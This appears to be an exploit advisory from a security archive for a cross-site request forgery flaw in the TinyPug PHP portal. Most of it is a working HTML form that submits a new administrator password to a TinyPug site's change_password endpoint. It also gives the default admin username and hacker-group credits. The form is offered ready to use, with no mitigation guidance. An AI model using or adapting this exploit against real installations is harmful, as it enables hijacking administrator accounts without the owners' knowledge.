TinyPug suffers from a cross site request forgery vulnerability.
0708377b9c58799c6cba394d0e8c610c9002204922dc1b9fed0077d1fd4aa235
==============================================================================
[»] ~ Note : [ Default Username Of Admin : Administrator ]
==============================================================================
[»] Tinypug Remote Change Password Exploit
==============================================================================
[»] Script: [ Tinypug ]
[»] Language: [ PHP ]
[»] Site page: [ Tinypug is a system for building portals that enable innovation communities and customer inquiry. ]
[»] Download: [ http://code.google.com/p/tinypug/ ]
[»] Founder: [ ViRuSMaN <v.-m@live.com - totti_55_3@yahoo.com> ]
[»] Greetz to: [ HackTeach Team , Egyptian Hackers , All My Friends & Islam-Defenders.com ]
[»] My Home: [ HackTeach.Org , Islam-Attack.Com ]
###########################################################################
===[ Exploit ]===
<html>
<head>
<title>Tinypug Remote Change Admin Password Exploit [By:MvM]</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body>
<form action="http://tinypug.com/profiles/change_password" method="post" id="the_form">
<div class='frmrow'>
<label for="password">New Password: </label>
<input type="password" name="password" value="" /> </div>
<div class='frmrow'>
<label for="password2">Enter Again To Confirm: </label>
<input type="password" name="password2" value="" /> </div>
<div class='frmsubmit'>
<input type="submit" name="submit" value="Change Password" /></div>
</form>
</body>
</html>
Author: ViRuSMaN <-
###########################################################################
________________________________
Hotmail: Powerful Free email with security by Microsoft. Get it now.<https://signup.live.com/signup.aspx?id=60969>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed